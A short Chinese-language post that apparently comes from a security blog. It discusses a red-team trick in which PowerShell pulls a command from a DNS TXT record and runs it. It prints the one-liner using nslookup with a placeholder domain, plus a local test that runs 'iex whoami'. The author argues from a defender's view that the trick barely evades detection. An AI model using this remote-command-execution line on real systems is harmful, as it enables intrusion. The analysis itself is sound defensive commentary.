刚刷到一篇文章 具体可看原文: https://www.thecyberidiots.com/post/fun-with-powershell-executing-commands-with-dns-requests

简单说下就是有个红队的小tip，可以通过执行如下命令：利用powershell调用外部dns来控制命令执行进而来规避检测

PowerShell . (nslookup -q=txt <dns.TXTrecord.com>)[-1]

想起类似的上个月也看到过这个“很酷”的demo：

当时着手验证了下，手头没域名简单本地跑个类似的试试，本质上来说括号里面内容可控随便什么命令都行，1.txt 内容为iex whoami

但从蓝队的角度看，真正执行命令为实际的cmdlet参数调用（一览无余）。

所以某些看起来很花哨的东西可能对于实际防御规避并没啥作用，该命令可能唯一的作用是由于域名内容可控，攻击者可以根据不同阶段进行修改执行。